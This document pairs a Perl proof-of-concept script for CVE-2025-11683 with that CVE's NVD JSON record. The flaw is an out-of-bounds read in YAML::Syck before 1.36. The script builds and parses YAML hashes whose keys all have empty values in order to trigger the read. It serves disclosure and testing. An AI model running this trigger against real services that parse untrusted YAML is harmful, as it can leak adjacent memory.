CVE-2025-11683

# CVE-2025-11683 PoC - YAML::Syck Missing Null-Terminator OOB Read # This PoC demonstrates the vulnerability by creating a YAML file # with a hash of all keys and empty values that triggers the # out-of-bounds read in token.c of YAML::Syck versions < 1.36 use strict; use warnings; use YAML::Syck; # Create a malicious YAML structure with all keys and empty values # This triggers the missing null-terminator issue in token.c my $yaml_content = <<'EOF'; --- hash_key_with_very_long_name_to_trigger_oob_read: key1: key2: key3: key4: key5: key6: key7: key8: key9: key10: another_key: yet_another_key: final_key: EOF # Write the malicious YAML to a file open(my $fh, '>', 'malicious.yaml') or die "Cannot create file: $!"; print $fh $yaml_content; close($fh); # Parse the YAML file - this will trigger the OOB read print "Parsing malicious YAML file...\n"; my $data = YAML::Syck::LoadFile('malicious.yaml'); print "Parsing complete. Data structure:\n"; print Dumper($data) if require Data::Dumper; # Alternative: Use Load with inline YAML containing complex hash structures my $inline_yaml = "{ key1:, key2:, key3:, key4:, key5:, key6:, key7:, key8:, key9:, key10: }"; my $result = YAML::Syck::Load($inline_yaml); print "\nPoC completed. The OOB read has been triggered during parsing.\n"; print "Affected versions: YAML::Syck < 1.36\n"; print "Fixed in: YAML::Syck 1.36\n";

{"cve": {"id": "CVE-2025-11683", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2025-10-16T01:15:32.890", "lastModified": "2026-03-09T15:05:36.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "YAML::Syck versions before 1.36 for Perl has missing null-terminators which causes out-of-bounds read and potential information disclosure\n\nMissing null terminators in token.c leads to but-of-bounds read which allows adjacent variable to be read\n\nThe issue is seen with complex YAML files with a hash of all keys and empty values.  There is no indication that the issue leads to accessing memory outside that allocated to the module."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:toddr:yaml\\:\\:syck:*:*:*:*:*:perl:*:*", "versionEndExcluding": "1.36", "matchCriteriaId": "A2B7A1EA-2180-4708-BB3B-A14CD7F2ECF9"}]}]}], "references": [{"url": "https://github.com/cpan-authors/YAML-Syck/pull/65", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Issue Tracking"]}, {"url": "https://metacpan.org/dist/YAML-Syck/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Product", "Release Notes"]}]}}